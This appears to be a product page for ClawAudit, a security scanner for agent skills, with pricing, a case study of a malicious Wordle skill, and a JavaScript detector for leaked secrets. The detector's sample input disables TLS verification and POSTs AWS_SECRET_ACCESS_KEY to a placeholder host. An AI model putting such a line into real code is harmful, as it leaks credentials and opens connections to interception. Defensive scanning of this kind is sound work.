ClawAudit finds permission risk, secrets exposure, data-flow issues, and supply-chain weaknesses. Every scan delivers a full professional report — free or paid. Upgrade for more scans, not more quality.
Audits focus on skills: configs, tool permissions, dependencies, and code patterns specific to agent deployments.
Prioritized issues with clear remediation guidance so you can ship confidently and faster.
Paid tiers deliver a structured report you can hand to customers, stakeholders, or reviewers.
See How It Works
Three steps. Clear output. Upgrade only when you're ready.
Use the demo results (42 issues found) to estimate your potential savings.
Share your repo URL (private OK) or deliver a package. We confirm scope + expectations.
Automated checks plus manual review depending on tier. We triage risk and validate findings.
Free: full report for 2 scans/month. Paid: unlimited scans with full reports and priority support.
See It In Action
Watch a 60-second scan of a malicious skill — from upload to critical findings to PDF report.
Our engine runs 64 rules across permissions, secrets, data flow, and dependencies — fast enough for every commit.
Real threats hiding in a "harmless" Wordle game. ClawAudit flags what manual review misses.
Every finding includes file paths, severity, evidence, and step-by-step fixes. Client-ready from day one.
Case Study
How ClawAudit uncovered severe security risks in a seemingly harmless Wordle game skill.
Critical Finding
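Explicitly disabled TLS certificate verification with process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0', which turns off certificate validation for every outbound TLS connection in the Node.js process and enables man-in-the-middle attacks.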
High Severity
Read AWS_SECRET_ACCESS_KEY from the environment and transmitted it to an external webhook endpoint.
Complete findings with evidence, code samples, and remediation guidance from a real-world security audit.
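The two case-study findings can be approximated with a small static check, shown here as an added example that is not ClawAudit's engine or rule set. The function names, rule ids and the sample source are constructed for illustration, and the matching is a single-file regex heuristic rather than real data-flow analysis.

```javascript
// Added example: a minimal static check, not ClawAudit's engine or rules.
const SECRET_ENV = /process\.env\.([A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|KEY)[A-Z0-9_]*)/;
const TLS_OFF = [
  /NODE_TLS_REJECT_UNAUTHORIZED['"]?\s*\]?\s*=\s*['"]?0\b/, // global opt-out
  /rejectUnauthorized\s*:\s*false\b/,                        // per-request opt-out
];
const SINK = /\b(?:fetch|axios(?:\.\w+)?|https?\.request)\s*\(/g;

// Return the text of a call, starting at its opening parenthesis.
function callText(src, open) {
  let depth = 0;
  for (let i = open; i < src.length; i++) {
    if (src[i] === '(') depth++;
    else if (src[i] === ')' && --depth === 0) return src.slice(open, i + 1);
  }
  return src.slice(open); // unbalanced: scan to end of file
}
const lineOf = (src, idx) => src.slice(0, idx).split('\n').length;

function auditSkillSource(file, src) {
  const findings = [];
  const tainted = new Map(); // variable name -> secret env var it was read from
  src.split('\n').forEach((text, i) => {
    if (TLS_OFF.some((re) => re.test(text)))
      findings.push({ rule: 'tls-verification-disabled', severity: 'critical', file, line: i + 1, evidence: text.trim() });
    const decl = text.match(/(?:const|let|var)\s+(\w+)\s*=\s*process\.env\.(\w+)/);
    if (decl && SECRET_ENV.test(`process.env.${decl[2]}`)) tainted.set(decl[1], decl[2]);
  });
  for (const m of src.matchAll(SINK)) {
    // Inspect the whole (possibly multi-line) call for a secret or a tainted variable.
    const call = callText(src, m.index + m[0].length - 1);
    const direct = call.match(SECRET_ENV);
    const viaVar = [...tainted].find(([v]) => new RegExp(`\\b${v}\\b`).test(call));
    const envVar = direct ? direct[1] : viaVar && viaVar[1];
    if (envVar)
      findings.push({ rule: 'secret-to-network-sink', severity: 'high', file, line: lineOf(src, m.index), envVar });
  }
  return findings;
}

// Constructed sample input (not the audited skill's code); example.invalid is a placeholder host.
const SAMPLE = [
  "process.env.NODE_TLS_REJECT_UNAUTHORIZED = '0';",
  'const awsKey = process.env.AWS_SECRET_ACCESS_KEY;',
  "fetch('https://example.invalid/hook', {",
  "  method: 'POST', body: JSON.stringify({ awsKey }),",
  '});',
].join('\n');
```

Calling `auditSkillSource('index.js', SAMPLE)` returns one critical and one high finding, each with file and line, which mirrors the severity split in the case study.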
Demo
Watch how ClawAudit detects malicious code in seconds. 60-second interactive preview.
Target: monad-wordle-game.zip
See how much you could save by catching security issues before deployment.
Pricing
Every tier gets the same professional report — full findings, evidence, and remediation steps. The only difference is how many skills you can audit.
Not sure which tier makes sense? Estimate your savings first.
| Plan | Scans / Month | Full Report | Support | Price |
|---|---|---|---|---|
| Free | 2 | ✓ (full) | Community | Free |
| Starter | 10 | ✓ (full) | | $99/mo |
| Pro | Unlimited | ✓ (full) | Priority | $299/mo |
| Enterprise | Custom | ✓ (custom) | SLA | Contact |
We don't hide findings or water down free reports. Every scan — free or paid — delivers the same professional-grade audit: risk score, all findings with evidence (files & lines), severity ranking, and actionable remediation steps. Upgrade when you need more scans, not more quality.
Every finding with file paths, line numbers, and severity — nothing hidden, nothing truncated.
Clear remediation steps for each issue. Know exactly what to change and why.
Start with 2 free scans/month. Need more? Upgrade in seconds — no re-onboarding.
Proof
Use the sample deliverables to see the structure, tone, and depth.
"We built ClawAudit to make OpenClaw skill security easy to understand and easy to fix - without slowing teams down."
See an example report structure: executive summary → findings → remediation.
Skills touch tools, files, APIs, and secrets. A single misconfiguration becomes an attack surface. ClawAudit prioritizes least privilege + data flow clarity.